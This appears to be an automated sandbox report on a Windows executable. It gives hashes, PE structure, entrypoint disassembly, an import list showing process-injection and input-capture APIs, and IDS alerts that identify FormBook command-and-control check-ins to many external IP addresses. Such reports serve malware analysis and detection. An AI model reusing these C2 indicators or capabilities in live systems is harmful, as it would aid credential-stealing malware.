                                                                                                                  MD5:dc1b0b674722f76e68cdfcd373c34ab9
                                                                                                                  SHA1:c6862db7bccf03b7e3a66f98cc05b4bf624cc9fa
                                                                                                                  SHA256:6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f
                                                                                                                  SHA512:a71733ff69e8f720a7aa176fb639b74942e5e556a5761cc914771a7ab0ec0d66f062afbaf1cb25719f2bbe52c8669931c99da0e7ffda293f4054f341a1317b9a
                                                                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCGRamDgJ21ry4pEPYb3IcJbY7MAab6f7ro:7JZoQrbTFZY1iaCKaN2VBSYb5O7MAvo
                                                                                                                  TLSH:5055F221B5D68036C2B327B19E7EF7A9963D793A0336D29727C82E311E505416B3A733
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                  File Icon

                                                                                                                  Icon Hash:1733312925935517

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4165c1
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F4B8CC55ACBh
                                                                                                                  jmp 00007F4B8CC4C93Eh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                                                                  mov ecx, dword ptr [ebp+10h]
                                                                                                                  mov edi, dword ptr [ebp+08h]
                                                                                                                  mov eax, ecx
                                                                                                                  mov edx, ecx
                                                                                                                  add eax, esi
                                                                                                                  cmp edi, esi
                                                                                                                  jbe 00007F4B8CC4CABAh
                                                                                                                  cmp edi, eax
                                                                                                                  jc 00007F4B8CC4CC56h
                                                                                                                  cmp ecx, 00000080h
                                                                                                                  jc 00007F4B8CC4CACEh
                                                                                                                  cmp dword ptr [004A9724h], 00000000h
                                                                                                                  je 00007F4B8CC4CAC5h
                                                                                                                  push edi
                                                                                                                  push esi
                                                                                                                  and edi, 0Fh
                                                                                                                  and esi, 0Fh
                                                                                                                  cmp edi, esi
                                                                                                                  pop esi
                                                                                                                  pop edi
                                                                                                                  jne 00007F4B8CC4CAB7h
                                                                                                                  jmp 00007F4B8CC4CE92h
                                                                                                                  test edi, 00000003h
                                                                                                                  jne 00007F4B8CC4CAC6h
                                                                                                                  shr ecx, 02h
                                                                                                                  and edx, 03h
                                                                                                                  cmp ecx, 08h
                                                                                                                  jc 00007F4B8CC4CADBh
                                                                                                                  rep movsd
                                                                                                                  jmp dword ptr [00416740h+edx*4]
                                                                                                                  mov eax, edi
                                                                                                                  mov edx, 00000003h
                                                                                                                  sub ecx, 04h
                                                                                                                  jc 00007F4B8CC4CABEh
                                                                                                                  and eax, 03h
                                                                                                                  add ecx, eax
                                                                                                                  jmp dword ptr [00416654h+eax*4]
                                                                                                                  jmp dword ptr [00416750h+ecx*4]
                                                                                                                  nop
                                                                                                                  jmp dword ptr [004166D4h+ecx*4]
                                                                                                                  nop
                                                                                                                  inc cx
                                                                                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                  inc cx
                                                                                                                  add byte ptr [ebx], ah
                                                                                                                  ror dword ptr [edx-75F877FAh], 1
                                                                                                                  inc esi
                                                                                                                  add dword ptr [eax+468A0147h], ecx
                                                                                                                  add al, cl
                                                                                                                  jmp 00007F4B8F0C52B7h
                                                                                                                  add esi, 03h
                                                                                                                  add edi, 03h
                                                                                                                  cmp ecx, 08h
                                                                                                                  jc 00007F4B8CC4CA7Eh
                                                                                                                  rep movsd
                                                                                                                  jmp dword ptr [00000000h+edx*4]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                  • [C++] VS2010 SP1 build 40219
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [ASM] VS2010 SP1 build 40219
                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                  RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                  RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                  RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                  RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                  RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                  RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                  RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                  RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                  RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                  RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                  RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishGreat Britain
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-10-08T15:37:51.503796+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54986344.213.25.7080TCP
                                                                                                                  2024-10-08T15:37:51.503796+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54986344.213.25.7080TCP
                                                                                                                  2024-10-08T15:38:08.600828+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549956206.119.82.13480TCP
                                                                                                                  2024-10-08T15:38:10.550616+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549973206.119.82.13480TCP
                                                                                                                  2024-10-08T15:38:13.144831+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549978206.119.82.13480TCP
                                                                                                                  2024-10-08T15:38:15.642976+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549979206.119.82.13480TCP
                                                                                                                  2024-10-08T15:38:15.642976+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549979206.119.82.13480TCP
                                                                                                                  2024-10-08T15:38:21.384116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998067.223.117.18980TCP
                                                                                                                  2024-10-08T15:38:23.946554+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998167.223.117.18980TCP
                                                                                                                  2024-10-08T15:38:26.501962+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998267.223.117.18980TCP
                                                                                                                  2024-10-08T15:38:29.065298+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998367.223.117.18980TCP
                                                                                                                  2024-10-08T15:38:29.065298+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54998367.223.117.18980TCP
                                                                                                                  2024-10-08T15:38:42.752643+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499843.33.130.19080TCP
                                                                                                                  2024-10-08T15:38:45.280121+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499853.33.130.19080TCP
                                                                                                                  2024-10-08T15:38:47.853763+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499863.33.130.19080TCP
                                                                                                                  2024-10-08T15:38:50.414469+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499873.33.130.19080TCP
                                                                                                                  2024-10-08T15:38:50.414469+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499873.33.130.19080TCP
                                                                                                                  2024-10-08T15:38:56.866137+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988183.181.83.13180TCP
                                                                                                                  2024-10-08T15:38:59.367057+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549989183.181.83.13180TCP
                                                                                                                  2024-10-08T15:39:02.344376+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549990183.181.83.13180TCP
                                                                                                                  2024-10-08T15:39:04.853667+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549991183.181.83.13180TCP
                                                                                                                  2024-10-08T15:39:04.853667+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549991183.181.83.13180TCP
                                                                                                                  2024-10-08T15:39:11.019411+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999238.47.232.19680TCP
                                                                                                                  2024-10-08T15:39:13.570786+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999338.47.232.19680TCP
                                                                                                                  2024-10-08T15:39:16.163311+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999438.47.232.19680TCP
                                                                                                                  2024-10-08T15:39:18.595077+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999538.47.232.19680TCP
                                                                                                                  2024-10-08T15:39:18.595077+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999538.47.232.19680TCP
                                                                                                                  2024-10-08T15:39:25.036234+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499963.33.130.19080TCP
                                                                                                                  2024-10-08T15:39:26.658843+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499973.33.130.19080TCP
                                                                                                                  2024-10-08T15:39:29.175267+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499983.33.130.19080TCP
                                                                                                                  2024-10-08T15:39:34.811433+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5499993.33.130.19080TCP
                                                                                                                  2024-10-08T15:39:34.811433+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5499993.33.130.19080TCP
                                                                                                                  2024-10-08T15:39:41.168002+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550000154.212.219.280TCP
                                                                                                                  2024-10-08T15:39:43.739751+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001154.212.219.280TCP
                                                                                                                  2024-10-08T15:39:46.492376+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002154.212.219.280TCP
                                                                                                                  2024-10-08T15:39:48.799063+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550003154.212.219.280TCP
                                                                                                                  2024-10-08T15:39:48.799063+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550003154.212.219.280TCP
                                                                                                                  2024-10-08T15:39:55.958587+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004133.130.35.9080TCP
                                                                                                                  2024-10-08T15:39:58.521482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005133.130.35.9080TCP
                                                                                                                  2024-10-08T15:40:01.304936+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006133.130.35.9080TCP
                                                                                                                  2024-10-08T15:40:03.615615+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550007133.130.35.9080TCP
                                                                                                                  2024-10-08T15:40:03.615615+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550007133.130.35.9080TCP
                                                                                                                  2024-10-08T15:40:09.260480+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500083.33.130.19080TCP
                                                                                                                  2024-10-08T15:40:13.226134+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500093.33.130.19080TCP
                                                                                                                  2024-10-08T15:40:15.751747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500103.33.130.19080TCP
                                                                                                                  2024-10-08T15:40:18.283403+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5500113.33.130.19080TCP
                                                                                                                  2024-10-08T15:40:18.283403+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500113.33.130.19080TCP
                                                                                                                  2024-10-08T15:40:24.764708+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012172.191.244.6280TCP
                                                                                                                  2024-10-08T15:40:27.311872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013172.191.244.6280TCP
                                                                                                                  2024-10-08T15:40:29.819752+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550014172.191.244.6280TCP
                                                                                                                  2024-10-08T15:40:32.455735+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550015172.191.244.6280TCP
                                                                                                                  2024-10-08T15:40:32.455735+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550015172.191.244.6280TCP
                                                                                                                  2024-10-08T15:40:38.306913+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550016162.241.244.10680TCP
                                                                                                                  2024-10-08T15:40:40.828582+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017162.241.244.10680TCP
                                                                                                                  2024-10-08T15:40:43.543677+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018162.241.244.10680TCP
                                                                                                                  2024-10-08T15:40:45.957320+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550019162.241.244.10680TCP
                                                                                                                  2024-10-08T15:40:45.957320+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550019162.241.244.10680TCP
                                                                                                                  2024-10-08T15:40:56.509717+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020199.59.243.22780TCP
                                                                                                                  2024-10-08T15:40:59.095041+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021199.59.243.22780TCP
                                                                                                                  2024-10-08T15:41:01.636055+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022199.59.243.22780TCP
